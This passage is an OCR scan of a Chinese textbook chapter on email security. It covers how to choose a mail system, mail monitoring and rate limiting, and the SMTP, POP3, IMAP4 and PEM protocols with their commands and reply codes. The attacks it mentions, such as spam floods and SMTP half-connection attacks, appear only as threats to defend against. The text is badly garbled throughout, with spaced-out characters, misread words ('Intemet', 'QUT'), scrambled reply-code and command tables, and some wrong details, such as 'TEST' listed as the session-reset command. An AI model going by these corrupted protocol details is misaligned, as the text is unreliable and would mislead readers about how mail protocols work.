企业 在 选 型 时 ， 应 该 了 解 清楚 邮件 系统 厂家 对 邮件 信息 的 加 密 标准 和 过 程 。 像 政府 单位 、 
银行 、 证 券 等 金融 机 构 ， 对 加 密 要 求 尤其 严格 ， 选 择 邮 件 系 统 时 ， 不 妨 对 该 产品 的 购买 用 
户 案例 也 做 一 定 的 了 解 。 


4. 邮件 监控 审核 


邮件 监控 审核 主要 用 于 防范 企业 核心 资料 的 泄露 ， 加 速 领导 或 者 部 门 主管 对 员工 邮件 
收发 审核 ， 及 时 拦截 不 正当 流通 的 邮件 。 此 项 功能 对 信息 保密 性 管理 堪 为 关键 。 对 不 同 的 
信息 所 要 求 的 监控 效果 也 有 所 不 同 ， 所 以 该 功能 需要 操作 简单 、 易 管理 、 规 则 多 样 化 。 

通过 过 滤 规 则 的 设置 ， 企 业 可 以 控制 各 类 用 户 或 者 各 个 不 同 部 门 邮件 的 收发 权限 ， 有 
效 的 保障 企业 的 机 密 资 料 的 安全 性 。 不 同 邮件 系统 对 过 滤 规 则 的 设置 是 不 一 样 的 ， 有 些 只 
能 单纯 的 对 具体 用 户 进行 设置 ， 功 能 丰富 的 产品 则 可 以 针对 不 同 的 一 、 部 门 、 发 件 人 或 收 
件 人 、 邮 件 主题 、 邮 件 内 容 、 时 间 等 条 件 进 行 过 滤 ， 从 更 加 细致 的 角度 规划 内 网 用 户 的 邮 
件 收发 权限 。 


5. 稳定 性 


邮件 系统 能 否 实现 对 SMTP 客户 端 并 发 连接 和 发 送 频率 的 控制 ， 直 接 反 映 了 邮件 服 
务 器 的 安全 性 和 可 靠 性 。 有 些 邮件 系统 因为 这 方面 功能 的 欠缺 ， 导 致 系统 运行 不 稳定 。 攻 
击 者 通过 垃圾 邮件 字典 攻击 ， 瞬 间 发 送 大 量 的 垃圾 邮件 ， 致 使 系统 面临 月 溃 的 威胁 。 针 对 
该 威胁 ， 邮 件 系统 可 以 使 用 控制 客户 端 连接 速率 的 策略 ， 保 证 邮件 业务 在 峰值 时 仍 保持 良 
好 的 运行 效率 ， 避 免 系统 的 拥堵 、 宕 机 。 

此 外 ，SMTP 超时 限定 ， 可 以 有 效 防 止 SMTP 半 连 接 攻 击 ， 进 而 提升 系统 的 防 DDoS 
攻击 能 力 。 如 何 验 证 用 户 身 份 ， 采 用 何 种 加 密 算 法 ， 也 至 关 重要 。 对 系统 各 种 信息 的 监 
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控 ， 例 如 webmail 在 线 用 户 、 队 列 、 SMTP 、POP3、IMAP 会 话 、web 服务 器 信息 、 系 
统 信息 等 ， 可 以 让 系统 管理 员 随 时 掌握 系统 运行 状况 ， 以 及 是 否 支 持 多 种 数据 库 用 户 信息 
的 存储 和 统一 认证 等 。 


6.2 电子 邮件 安全 协议 


电子 邮件 在 互联 网 上 传输 必须 遵循 统一 的 协议 规则 ， 当 前 常用 的 电子 邮件 协议 有 
SMTP、POP3、IMAP4， 他 们 都 隶属 于 TCP/IP 协议 徐 。 另 外 ， 为 了 保护 电子 邮件 安全 和 
传输 安全 制定 的 协议 有 : PEM、PGP、S/MIME、MOSS 等 ， 安 全 邮件 协议 提供 邮件 的 机 
密 性 ， 完 整 性 以 及 不 可 抵赖 性 等 ， 使 电子 邮件 的 安全 性 得 到 充分 的 保障 ， 从 而 使 在 
Intemet 上 通过 电子 邮件 传送 敏感 、 重 要 的 信息 成 为 可 能 。 


6.2.1 SMTP 协议 


SMTP(Simple Mail Transfer Protocol)， 即 简单 邮件 传输 协议 ， 是 一 组 用 于 从 源 地 址 到 
目的 地 址 传送 邮件 的 规范 ， 通 过 它 来 控制 邮件 的 中 转 方式 和 传输 方式 。SMTP 协议 帮助 每 
台 计 算 机 在 发 送 或 中 转 信件 时 找到 下 一 个 目的 地 。 默 认 状 态 下 ，SMTP 协议 使 用 TCP 端 
口 25 建立 连接 。 关 于 SMTP 的 详细 介绍 可 以 参考 RFC821。 


1. 连接 过 程 


SMTP 协议 是 基于 文本 的 传输 协议 ， 发 送 的 所 有 电子 邮件 都 是 基于 普通 文本 格式 的 。 
SMTP 命令 、 响 应 以 及 邮件 内 容 均 使 用 NVT ASCII 格式 的 文本 ， 且 以 明文 传输 。SMTP 协 
议 基于 请 求 响应 的 工作 方式 ， 客 户 端 发 送 命令 ， 服 务 器 返回 响应 ， 通 过 这 种 交互 方式 ， 完 
成 邮件 传输 过 程 的 三 个 阶段 : 建立 连接 、 传 输 数据 和 释放 连接 ， 如 图 6-4 所 示 。 

(1) 用 户 发 送 邮件 时 ， 客 户 端 主动 连接 到 服务 器 的 25 端口 ， 请 求 建立 TCP 连接 。 
SMTP 服务 器 如 果 可 用 ， 会 发 送 220 应 答 ， 表 示 服 务 就 绪 。 

(2) 客户 端 向 服务 器 发 送 HELO 命令 ， 并 附 上 发 送 方 主机 名 ， 用 以 标识 发 送 方 身 
份 。 如 果 服 务 器 返回 “250 OK”， 则 表示 有 能 力 接收 邮件 ， 并 准备 好 接收 。 和 否则 返回 相 
应 的 错误 代码 。 

(3) 邮件 传送 从 MAIL 命令 开始 ，FROM 后 跟着 发 送 方 邮 件 地 址 ， 如 MAIL 
FROM:<lili@sohu.com>。 如 果 服 务 器 准备 接收 邮件 ， 则 返回 “250 OK”， 和 否则 返回 错误 
代码 ， 指 明 原 因 。 

(4) 随后 是 RCPT 命令 ， 指 明 收 件 人 地 址 ， 如 果 有 多 个 收 件 人 ， 可 以 发 送 多 个 RCPT 
命令 。 如 果 服 务 器 可 以 识别 收 件 人 ， 则 返回 250 应 答 ， 否 则 返回 “550 No such user 
here”， 即 用 户 不 存在 。 

(5) 客户 端 与 服务 器 间 协 商 结束 ， 客 户 端 发 送 DATA 命令 通知 服务 器 开始 传送 数 
据 。 如 果 服 务 器 准备 接收 数据 ， 就 返回 信息 “354 Start mail; end with 
<CRLF>.<CRLF>”。 

(6) 接着 SMTP 客户 端 发 送 邮件 内 容 ， 发 送 完毕 后 ， 再 发 送 <CRLF>.<CRLF>( 两 个 回 
车 换行 中 间 用 一 个 点 隔 开 ) 表 示 邮 件 内 容 结束 。 实 际 上 在 服务 器 端 看 到 的 可 打印 字符 只 是 
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一 个 英文 的 名 点。 邮件 收 到 ， 服 务 器 返回 250 应 答 ， 否 则 返回 差错 代码 。 
(7) 所 有 邮件 发 送 完 毕 后 ，SMTP 客户 端 发 送 QUIT 命令 。 服 务 器 返回 221 应 答 ， 表 
示 同 意 释 放 TCP 连接 ， 邮 件 传输 的 全 部 过 程 结束 。 


SMTP 客 户 端 SMTP 服 务 器 SMTP 客 户 端 SMTP 服 务 器 


SMTP 客 户 端 SMTP 服 务 器 SMTP 客 户 端 SMTP 服 务 器 


QUT 


221 服 务 关闭 


(gq) 
图 6-4 SMTP 连接 过 程 
2. 请 求 和 响应 
SMTP 简捷 的 原因 之 一 是 它 使 用 的 命令 少 ，SMTP 常用 命令 如 下 所 示 : 
@ HELO: 向 服务 器 发 送 请 求 ， 启 动 邮件 传输 过 程 ， 以 发 送 方 主机 域名 来 标识 
身份 。 
AUTH LOGIN: 用 户 身 份 认证 。 
MAIL FROM: 初始 化 邮件 传输 。 
@ RCPT TO: 标识 邮件 接收 和 人 地址 ， 常 用 在 MAIL FROM 后 ， 可 跟 多 个 RCPT 
TO。 
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DATA: 将 之 后 的 数据 作为 邮件 发 送 。 
TEST: 重 置 会 话 ， 当 前 传输 被 取消 。 
QUIT: 结束 会 话 。 
VRFY: 验证 指定 的 用 户 或 邮箱 是 否 存在 ， 即 验证 接收 方 地址 是 否 正确 。 
NOOP: 空 操作 ， 要 求 服务 器 返回 OK 应 答 ， 一 般 用 作 测 试 。 
@ HELP: 查 新 服务 器 支持 的 命令 。 
每 条 SMTP 命令 都 会 返回 一 条 响应 ，SMTP 的 响应 是 一 个 3 位 数字 的 应 答 码 ， 后 面 跟 
着 的 是 描述 文本 ， 如 表 6-1 所 示 。 


表 6-1 SMTP 应 答 码 
代码 描 述 代 码 描 述 
211 。 | 系统 状态 或 系统 帮助 响应 命令 不 可 识别 或 语法 错 
214 帮助 信息 501 参数 语法 错 
220 | 服务 准备 就 绪 全 一 命令 不 支持 
221 关闭 连接 命令 顺序 错 
250 | 请 求 操作 就 绪 命令 参数 不 支持 
251 。 | 非 本 地 用 户 ， 转 发 到 <forward-path> 操作 未 执行 ， 邮 箱 不 可 用 

， 以 <CRLF>.<CRLF> 结 

354 ee 非 本 地 用 户 ， 请 尝试 <forward-path> 
421 。 | 服务 不 可 用 二 操作 中 止 ， 存 储 空间 不 足 
450 | 操作 未 执行 ， 邮 箱 念 | 553 。 | 操作 未 执行 ， 邮 箱 名 不 正确 
451 。 | 操作 中 止 ， 本 地 错误 | 554 | 传输 失败 
452 | 操作 未 执行 ， 存 储 空间 不 足 | | 


SMTP 命令 过 于 简单 ， 提 供 的 功能 相对 较 少 ， 某 些 情况 下 ， 难 以 满足 邮件 系统 安全 性 
的 需求 ， 因 此 ， 标 准 化 组 织 对 其 进行 了 扩充 ， 制 定 了 ESMTP(Extended SMTP)， 对 应 的 
RFC 文档 为 RFC1425。 

ESMTP 增加 了 用 户 认证 功能 ， 认 证 过 程 可 以 是 基于 明文 的 认证 ， 也 可 以 是 基于 MD5 
加 密 的 认证 。 如 果 用 户 想 使 用 ESMTP 提供 的 新 命令 ， 则 在 初次 与 服务 器 交互 时 ， 发 送 的 
命令 应 该 是 EHLO， 而 不 是 HELO。 


6.2.2 POP3 协议 


POP 的 全 称 是 Post Office Protocol， 即 邮局 协议 ， 是 一 种 邮件 接收 协议 。POP 协议 使 
用 TCP 的 110 端口 ， 已 发 展 到 第 三 个 版 本 ， 即 POP3， 对 应 的 RFC 文档 是 RFC1939。 

POP 协议 用 于 电子 邮件 的 接收 ， 当 用 户 计 算 机 与 支持 POP 协议 的 邮件 服务 器 连接 
时 ， 把 存储 在 该 服务 器 电子 邮箱 中 的 邮件 准确 无 误 地 下 载 到 用 户 的 计算 机 中 。 

POP 属于 离线 式 协议 ， 即 不 能 对 邮件 进行 在 线 操作 ， 必 须 下 载 到 本 地 才能 进行 处 理 。 
离线 工作 方式 适合 于 那些 从 固定 计算 机 上 接收 邮件 的 用 户 使 用 ， 用 户 不 必 每 次 都 登录 所 有 
的 服务 器 去 查看 邮件 。 邮 件 下 载 时 可 以 选择 从 服务 器 上 删除 ， 也 可 以 选择 在 服务 器 上 保存 


第 6 章 电子 邮件 安全 189 


副本 (POP3 中 的 功能 )。 
1. 请 求 和 响应 


POP3 和 SMTP 一 样 都 是 请 求 响应 协议 ， 命 令 与 响应 也 都 是 用 NVT ASCII 格式 的 文本 
表示 。POP3 常用 命令 如 下 所 示 : 
USER usermame: 指定 用 户 名 。 
PASS ”password: 指定 密码 ， 若 认证 成 功 ， 则 导致 状态 转换 。 
APOP Name，Digest: Digest 是 MD5 消息 摘要 。 
STAT: 询问 邮箱 状态 ， 如 邮件 总 数 和 总 字 节 数 等 。 
UIDL: 返回 邮件 的 唯一 标识 符 ，POP3 会 话 的 每 个 标识 符 都 将 是 唯一 的 。 
LIST [Msg 榴 : 列 出 邮件 索引 。 
RETR [Msg#]: 取 回 指定 邮件 ， 返 回 由 参数 标识 的 邮件 的 全 部 文本 。 
DELE [Msg#]: 删除 指定 邮件 ， 把 有 参数 标识 的 文件 标记 为 删除 ， 由 quit 命令 
执行 。 

@ NOOP: 空 操作 ， 服 务 器 返回 一 个 肯定 的 响应 。 

@ RSET: 重 置 所 有 标记 为 删除 的 邮件 ， 用 于 撤销 DELE 命令 。 

e@ ”QUIT: 提交 修改 并 断 开 连接 。 

POP3 协议 的 响应 由 一 个 状态 码 和 其 后 的 附加 信息 组 成 ，POP3 只 有 两 种 状态 码 : 
“+OK”( 正 确 ) 和 “-ERR”( 失 败 )。 

2. 连接 过 程 

在 POP3 协议 中 ， 客 户 端 与 服务 器 连接 时 有 三 种 处 理 状 态 : 身份 认证 状态 、 事 物 处 理 
状态 和 更 新 状态 。 

当 客 户 端 连接 到 服务 器 的 110 端口 ， 并 建立 起 TCP 连接 后 ， 即 进入 身份 验证 状态 
需要 使 用 USER 和 PASS 命令 将 用 户 名 和 密码 提供 给 服务 器 。 

通过 身份 验证 之 后 ， 即 转 入 事务 处 理 状态 ， 这 时 客户 端 可 以 发 送 POP3 命令 进行 相应 
操作 ， 服 务 器 会 接收 命令 并 做 出 响应 。 该 阶段 可 执行 的 命令 包括 : STAT、UIDL、LIST、 
RETR、DELE、RSET 和 NOOP。 

操作 完成 之 后 ， 客 户 端 发 出 QUIT 命令 ， 则 进入 更 新 状态 ， 服 务 器 确认 用 户 的 操作 ， 
更 新 邮件 存储 区 ， 同 时 关闭 客户 端 与 服务 器 之 间 的 连接 。 


6.2.3 1IMAP4 协议 


IMAP4(Intemet Message Access Protocol 4) 即 交互 式 数据 消息 访问 协议 第 四 个 版 本 。 与 
POP3 协议 一 样 ，IMAP4 也 是 规定 个 人 计算 机 如 何 访问 互联 网 上 的 邮件 服务 器 进行 收发 邮 
件 的 协议 ， 但 比 POP3 协议 更 高 级 。IMAP4 使 用 TCP 的 143 端口 ， 由 RFC3501 定义 。 

1. 工作 原理 


IMAP4 协议 适用 于 C/S 架构 ， 支 持 对 服务 器 上 的 邮件 进行 扩展 性 操作 ， 也 支持 ASCI[ 
码 明文 传输 密码 。 


190 网 络 安全 与 管理 


IMAP4 支持 三 种 模式 与 客户 进行 交互 : 离线 、 在 线 和 断 连 模式 。 此 外 ，IMAP4 可 以 
让 用 户 访问 多 个 私 用 和 共享 邮箱 。 
@ ”离线 模式 ， 客户 软件 把 邮箱 存储 在 本 地 硬盘 上 以 进行 读 取 和 撰写 信息 的 工作 。 当 
需要 发 送 和 接收 邮件 时 ， 才 与 服务 器 建立 连接 。 
@ 在线 模式 ， 用 户 通过 客户 端 程序 来 操作 服务 器 上 的 邮件 ， 邮 件 始终 存储 在 服务 器 
上 ， 不 需要 下 载 到 本 地 操作 。IMAP4 可 以 在 客户 端 列 出 所 有 邮件 的 信息 目录 ， 
如 到 达 时 间 、 主 题 、 发 件 人 、 大 小 等 ， 同 时 还 提供 选择 性 下 载 附 件 的 服务 。 
@ ” 断 连 模式 ， 客户 端 程序 把 用 户 选 定 的 邮件 和 附件 复制 或 缓存 到 本 地 磁盘 上 ， 并 把 
原始 副本 留存 在 邮件 服务 器 上 。 缓 存 中 的 邮件 可 以 被 用 户 处 理 ， 以 后 用 户 重新 连 
接 邮件 服务 器 时 ， 这 些 邮 件 可 以 与 服务 器 进行 再 同步 。 当 服务 器 有 新 的 消息 时 ， 
也 会 同步 到 本 地 磁盘 。 该 功能 由 IMAP 协议 的 分 布 式 存储 机 制 解决 。 
IMAP4 协议 线程 有 4 种 处 理 状态 ， 大 部 分 的 IMAP4 命令 只 会 在 某 种 处 理 状态 下 才 有 
效 。 如 果 IMAP4 客户 端 软件 企图 在 不 恰当 的 状态 下 发 送 命令 ， 则 服务 器 将 返回 协议 错误 
的 失败 信息 ， 如 BAD 或 NO 等 。 
e@ ， 非 认证 状态 : 在 这 种 状态 下 ， 客 户 端 软件 必须 发 出 认证 请 求 命令 。 在 IMAP4 连 
接 建 立时 ， 服 务 器 处 理 线程 自动 进入 这 个 状态 。 
e@ ”认证 状态 ， 在 认证 状态 下 ， 客 户 软件 必须 选择 一 个 邮箱 。 这 个 状态 在 认证 请 求 命 
令 得 到 确认 答复 后 进入 ， 或 在 预 认证 连接 建立 后 直接 进入 。 
@ 已 选择 状态 : 表示 IMAP4 客户 软件 已 经 选择 了 某 一 Folder。 在 这 个 状态 下 可 以 
发 送 所 有 检索 邮件 内 容 的 命令 。 
@ ”离线 状态 : 连接 已 经 终止 ， 服 务 器 将 关闭 这 个 连接 。 客 户 端 软 件 可 以 发 出 命令 或 
由 服务 器 强制 进入 这 个 状态 。 
IMAP4 协议 交互 过 程 如 下 : 
(1) 邮件 服务 器 通过 侦 听 TCP 的 143 端口 开始 IMAP 服务 。 
(2) 当 客 户 端 需要 使 用 IMAP 服务 时 ， 发 送 请 求 与 服务 器 建立 TCP 连接 。 
(3) 连接 建立 后 ， 服 务 器 将 返回 一 行 用 回 车 换行 终结 的 问候 信息 ， 如 A002 OK 
IMAP4 Server。 连 接 启 动 时 ， 服 务 器 问候 信息 有 三 种 状态 : 
e@ OK: 表示 连接 成 功 ， 需 要 进一步 的 LOGIN 命令 ; 
@ PREAUTH: 表示 已 经 通过 外 部 手段 鉴别 了 连接 ， 因 此 ， 不 需要 LOGIN 命令 ; 
e@ BYE: 表示 服务 器 将 关闭 连接 。 
(4) 接着 客户 端 和 IMAP 服务 器 相互 交换 命令 和 响应 ， 一 直 持 续 到 连接 终止 。 服 务 器 
的 应 答 有 : 
@ ”OK 应 答 : 表示 服务 器 发 来 的 一 条 信息 ， 若 带 上 tag， 表 明 有 关 命 令 成 功 完 成 ; 
e@ NO 应 答 : 表示 服务 器 发 来 的 一 条 操作 错误 信息 ， 如 果 有 tag， 表 明 有 关 命 令 没 
有 成 功 ， 无 tag 的 格式 表示 警告 ， 命 令 仍 可 能 成 功 完成 ; 
e BAD 应 答 : 表示 服务 器 发 来 的 一 条 错误 信息 ， 如 果 有 tag， 报 告 客户 命令 中 协议 
级 别 的 错误 ， 无 tag 的 格式 表明 ， 因 无 法 确认 命令 产生 的 协议 级 别 的 错误 ， 也 能 
表示 一 个 服务 器 的 内 部 错误 。 


2. IMAP4 命令 


第 6 章 电子 邮件 安全 191 


IMAP4 协议 有 非常 丰富 的 功能 ， 可 以 对 整个 邮箱 进行 操作 ， 因 此 IMAP4 的 命令 相对 
较 多 ， 包 括 对 邮箱 中 文件 夹 的 操作 。IMAP4 协议 的 命令 格式 如 下 : 
<tag> 命令 参数 


IMAP4 的 命令 以 “tag” 开 头 ， 以 CRLF 结尾 ，tag 可 以 是 A001、A002。 表 6-2 中 列 


出 了 IMAP4 的 常用 命令 。 
表 6-2 IMAP4 常用 命令 
命令 参 数 描 述 

创建 指定 名 字 的 新 邮箱 ， 邮 箱 名 称 通常 是 带路 径 的 
CREATE <folder> 文件 夹 全 名 。 有 些 IMAP 客户 机 使 用 邮件 夹 称呼 新 

邮箱 

删除 指定 名 字 的 文件 夹 。 文 件 夹 名 字 通 常 是 带路 径 
DELETE <folder> 的 文件 夹 全 名 ， 当 邮箱 被 删除 后 ， 其 中 的 邮件 也 被 


LIST 


<BASE>< template> 


<folder><attributes> 


删除 

列 出 邮箱 中 己 有 的 文件 夹 ， 参 数 BASE: 表示 用 户 
登录 目录 ; template: 表示 希望 显示 的 邮箱 名 。 这 个 
命令 可 以 包含 起 始 的 路 径 位 置 和 需要 列 出 的 文件 夹 
所 符合 的 特征 ， 可 以 使 用 通配符 “*” 

从 Client 上 载 一 个 邮件 到 指定 的 Folder( 文 件 夹 / 邮 


APPEND <date/time><size> 箱 ) 中 。 参 数 包含 了 新 邮件 的 属性 、 日 期 /时 间 、 大 
<mail data> 小 ， 随 后 是 邮件 数据 
让 Client 选 定 某 个 邮箱 (Folder)， 表 示 即 将 对 该 邮箱 
ee a (Folder) 内 的 邮件 作 操 作 。 邮 箱 标志 的 当前 状态 也 返 
回 给 了 用 户 ， 同 时 返回 的 还 有 一 些 关 于 邮件 和 邮箱 
的 附加 信息 
FETCH <mail id> <datanames> | 读 取 邮 件 的 文本 信息 ， 且 仅 用 于 显示 的 目的 
<mail id> 修改 指定 邮件 的 属性 ， 包 括 给 邮件 打上 已 读 标记 、 
STORE Ed 
<new attributes> 删除 标记 等 
Client 结束 对 当前 Folder( 文 件 夹 /邮箱 ) 的 访问 ， 关 闭 
CLOSE 邮箱 该 邮箱 中 所 有 标志 为 、DELETED 的 邮件 就 被 
从 物理 上 删除 
在 不 关闭 邮箱 的 情况 下 删除 所 有 的 标志 为 、 
EXPUNGE DELETED 的 邮件 。EXPUNGE 删除 的 邮件 将 不 可 以 
恢复 
SUBSCRIBE <mailbox> 增加 参数 指定 的 邮箱 到 客户 机 的 活动 邮箱 列表 中 
UNSUBSCRIBE <mailbox> 从 活动 列表 中 去 掉 参 数 指定 的 邮箱 
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续 表 
命令 参 数 描 述 
列 出 folder 目录 下 所 有 使 用 SUBSCRIBE 命令 设置 
为 活动 邮箱 的 文件 
空 操作 ， 用 来 向 服务 器 发 送 自动 命令 ， 防 止 因 长 时 
间 处 于 不 活动 状态 而 导致 连接 中 断 ， 服 务 器 对 该 命 
令 的 响应 始终 为 肯定 
根据 搜索 条 件 在 处 于 活动 状态 的 邮箱 中 搜索 邮件 ， 
然后 显示 匹配 的 邮件 编号 。 字 符 集 标志 参数 
[CHARSET specification] 由 CHARSET 和 注册 的 字符 
集 标志 符 组 成 ， 默 认 的 标志 符 是 US-ASCI ， 所 以 
该 参数 常 省 略 。Search criteria: 查询 条 件 参 数 ， 明 
确 查询 的 关键 字 和 值 
退出 登录 并 关闭 所 有 打开 的 邮箱 ， 任 何 做 了 
\DELETED 标志 的 邮件 都 将 在 这 个 时 候 被 删除 


LSUB <folder> <mailbox> 


NOOP 


[CHARSET 
SEARCH specification] 。 (search 


criteria) 


LOGOUT 


3. IMAP4 与 POP3 比较 


IMAP4 是 邮件 访问 最 为 普遍 的 Intemet 标准 协议 ， 对 于 邮件 的 访问 提供 了 相对 于 广泛 
使 用 的 POP3 邮件 协议 的 另外 一 种 选择 。 基 本 上 两 者 都 允许 一 个 邮件 客户 端 访问 邮件 服务 
器 上 存储 的 信息 。IMAP4 的 优势 主要 表现 在 以 下 几 个 方面 。 

(1) 支持 连接 和 断 开 两 种 操作 模式 。 当 使 用 POP3 时 ， 客 户 端 只 会 连接 在 服务 器 上 一 
段 的 时 间 ， 直 到 它 下 载 完 所 有 新 信息 ， 客 户 端 即 断 开 连 接 。 在 IMAP 中 ， 只 要 用 户 界面 是 
活动 的 或 者 有 下 载 信息 的 需求 ， 客 户 端 就 会 一 直 连 接 在 服务 器 上 。 对 于 有 很 多 或 者 很 大 邮 
件 的 用 户 来 说 ， 使 用 IMAP4 模式 可 以 获得 更 快 的 响应 时 间 。 

(2) 支持 多 个 客户 同时 连接 到 一 个 邮箱 。POP3 协议 假定 邮箱 当前 的 连接 是 唯一 的 连 
接 。 相 反 ，IMAP4 协议 允许 多 个 用 户 同时 访问 邮箱 ， 并 提供 一 种 机 制 ， 让 用 户 能 够 感知 
到 当前 连接 该 邮箱 的 其 他 用 户 所 做 的 操作 。 

(3) 支持 在 服务 器 上 访问 多 个 邮箱 。IMAP4 客户 端 可 以 在 服务 器 上 创建 、 重 命名 或 
删除 邮箱 (通常 以 文件 夹 形 式 显现 给 用 户 )。 支 持 多 个 邮箱 还 允许 服务 器 提供 对 于 共享 和 公 
共 文件 夹 的 访问 。 

(4) 支持 在 服务 器 保留 消息 状态 信息 。 通 过 使 用 在 IMAP4 协议 中 定义 的 标志 客户 端 
可 以 跟踪 消息 状态 ， 例 如 邮件 是 否 被 读 取 、 回 复 或 者 删除 。 这 些 标识 存储 在 服务 器 ， 所 以 
多 个 客户 在 不 同时 间 访 问 一 个 邮箱 可 以 感知 其 他 用 户 所 做 的 操作 。 

(5) 支持 服务 器 端 搜索 。IMAP4 给 用 户 提供 了 一 种 机 制 ， 用 户 可 以 要 求 服务 器 搜索 
符合 多 个 标准 的 信息 。 在 这 种 机 制 下 客户 端 就 无 需 下 载 邮 箱 中 所 有 信息 来 完成 这 些 搜索 。 

(6) 支持 访问 消息 中 的 MIME 部 分 和 部 分 获取 。 几 乎 所 有 的 Intemet 邮件 都 是 以 
MIME 格式 传输 的 。MIME 允许 消息 包含 一 个 树 形 结构 ， 这 个 树 形 结构 的 叶子 节点 都 是 单 
一 内 容 类 型 而 非 多 块 类 型 的 组 合 。IMAP4 协议 允许 客户 端 获取 任何 独立 的 MIME 部 分 和 
获取 信息 的 一 部 分 或 者 全 部 。 这 些 机 制 使 得 用 户 无 需 下 载 附件 就 可 以 浏览 消息 内 容 或 者 在 
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获取 内 容 的 同时 浏览 。 

IMAPS 是 IMAP 协议 采用 SSL 加 密 的 协议 版 本 ， 所 获取 的 信息 均 为 加 密 的 信息 ， 所 
通过 的 端口 是 993 端口 ， 其 交互 过 程 中 的 状态 字 和 IMAP4 一 样 ， 只 是 在 建立 TCP 连接 
后 ， 再 建立 SSL 连接 ， 接 着 在 建立 的 SSL 中 进行 通信 。 


6.2.4 PEM 协议 


保密 增强 邮件 PEM(Privacy Enhancement for Intemet Electronic Mail)， 是 一 个 邮件 保密 
与 增强 的 规范 。 由 下 TF(mntemet 工程 特别 工作 组 ) 和 IRTF(Intermet 研究 特别 工作 组 ) 于 1993 
年 制定 ， 对 应 的 RFC 文档 编号 为 1421 一 1424。 

PEM 是 增强 Intemet 电子 邮件 隐秘 性 的 标准 草案 ， 在 Intemet 电子 邮件 的 标准 格式 上 
增加 了 加 密 、 鉴 别 和 密 钥 管理 的 功能 ， 人 允许 使 用 公开 密 钥 和 对 称 密 钥 的 加 密 方式 ， 并 能 够 
支持 多 种 加 密 工 具 。 对 于 单个 电子 邮件 报 文 ， 可 以 在 报 文 头 中 规定 特定 的 加 密 算法 、 数 字 
鉴别 算法 、 散 列 功能 等 安全 措施 。 它 的 实现 基于 PKI 公 钥 基础 结构 ， 并 遵循 X.509 认证 协 
议 ，PEM 提供 了 数据 加 密 、 鉴 别 、 消 息 完整 性 及 密 钥 管理 等 功能 ， 目 前 基于 PEM 的 具体 
实现 有 : TIS/PEM、RIPEM、MSP 等 多 种 软件 模型 。 


1. PEM 功能 


采用 PEM 加 密 邮件 传输 的 过 程 是 : 在 各 用 户 的 用 户 代 理 中 配 有 PEM 软件 。 用 户 代理 
提出 PEM 用 户 证 件 的 注册 申请 (按照 X.509 协议 )。 用 户 的 证 件 被 存储 在 一 个 可 公开 访问 
的 数据 库 中 ， 该 数据 库 提 供 一 种 基于 X.500 的 目录 服务 。 密 钥 等 机 密 信息 存储 在 用 户 的 个 
人 环境 PSE 中 。 用 户 使 用 本 地 PEM 软件 以 及 PSE 环境 信息 生成 PEM 邮件 ,然后 通过 基于 
SMTP 的 报 文 传递 代理 (MTA) 发 给 对 方 。 接 收 方 在 自身 的 PSE 中 将 报 文 解密 ,并 通过 目录 
检索 其 证 件 ， 查 阅 证 件 注销 表 以 核实 证 件 的 有 效 性 。 

PEM 是 一 个 只 能 够 保密 文本 信息 的 、 非 常 简 单 的 信息 格式 ，PEM 提供 以 下 4 种 安全 
服务 : 

@ 数据 隐蔽 : 使 数据 免 遭 非 授 权 的 泄露 ， 防 止 有 人 半路 截取 和 和 窃听。 

e 数据 完整 性 : 提供 通信 和 期间 数据 的 完整 性 ， 可 用 于 侦查 和 防止 数据 的 伪造 和 

算 改 。 

@ ”对 发 送 方 的 鉴别 :用 来 证 明 发 送 方 的 身份 防止 有 人 冒名 顶替 。 

@ ” 防 发 送 方 否认 : 结合 上 述 功能 ， 防 止 发 送 方 事后 不 承认 发 送 过 该 邮件 。 

PEM 目前 尚未 提供 存 取 控制 和 防 接收 方 否认 等 安全 功能 。 

PEM 标准 确定 了 一 个 简单 而 又 严格 的 全 球 认 证 分 级 。 无 论 是 公共 的 还 是 私人 的 ， 商 
业 的 还 是 其 他 的 ， 所 有 的 认证 中 心 都 是 这 个 分 级 中 的 一 部 分 。 

2. PEM 加 密 方式 

PEM 安全 功能 使 用 了 多 种 密码 工具 ， 包 括 非 对 称 加 密 算法 、 对 称 加 密 算法 以 及 报 文 
完整 性 检验 (Message Integrity Check，MIC) 算 法 等 。 

对 称 加 密 算 法 要 求 通信 双方 共享 同一 个 密 钥 ， 密 钥 传 递 需要 复杂 的 分 配 机 制 ， 如 
DES。 对 称 加 密 算法 不 能 作 鉴 别 用 ， 然 而 它 的 实现 在 速度 上 占 很 大 优势 。DES 软件 实现 要 
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比 RSA 快 100 倍 。 非 对 称 加 密 算法 的 密 钥 管理 简单 ， 又 能 用 于 数字 签名 等 鉴别 目的 ， 但 
通常 需要 较 多 的 CPU 时 间 。 因 而 在 PEM 的 具体 实现 上 ， 常 常 把 两 者 结合 起 来 。 

一 段 PEM 报 文通 常 由 两 部 分 组 成 : 一 个 是 头 部 ， 包 含 接收 方 用 于 报 文 解密 和 核实 等 
信息 ， 如 采用 的 算法 、MIC 以 及 证 件 等 ， 另 一 部 分 则 是 报 文本 身 。 

PEM 的 加 密 过 程 通常 包括 4 个 步骤 : 

e@ 报 文生 成 : 一 般 使 用 用 户 所 常用 的 格式 。 

@ ”规范 化 ， 转换 成 SMTP 的 内 部 表示 形式 。 

@ ”加 密 : 执行 选用 的 密码 算法 。 

@ 编码， 对 加 密 后 的 报 文 进行 编码 以 便 传输 。 

PEM 使 用 的 典型 加 密 算法 如 表 6-3 所 示 。 


表 6-3 PEM 使 用 的 典型 加 密 算法 


功 能 算 法 
产生 消息 摘要 MD2、MD5 算法 
加 密 消 息 摘要 ， 形 成 数字 签名 RSA 算法 
加 密会 话 密 钥 RSA 算法 
加 密 报 文 消息 DES、 三 重 DES 算法 
3. 证 件 及 其 管理 


PEM 用 于 邮件 的 加 密 ， 确 保 所 有 的 使 用 者 都 能 读 出 邮件 的 信息 ， 用 户 的 公 钥 必须 存 
储 在 其 他 用 户 能 访问 的 数据 库 中 。 公 钥 连 同 用 户 的 其 他 信息 ， 存 放 在 一 个 称 为 证 件 的 文件 
中 。 用 户 的 证 件 是 用 户 在 网 上 使 用 PEM 的 通行 证 。 每 个 证 件 除 包含 公 钥 外 ， 还 含有 用 户 
的 唯一 名 称 、 证 件 的 有 效 期 、 证 件 编 号 以 及 证 件 管理 机 构 的 签名 等 。 证 件 的 管理 由 一 证 明 
机 构 CA(Certification Authority) 完 成 。 证 件 的 结构 和 管理 均 在 X.509“The Directory- 
Authentication Framework” 中 定义 。 用 户 在 使 用 PEM 之 前 ， 必 须 先 进行 注册 。 用 户 应 向 
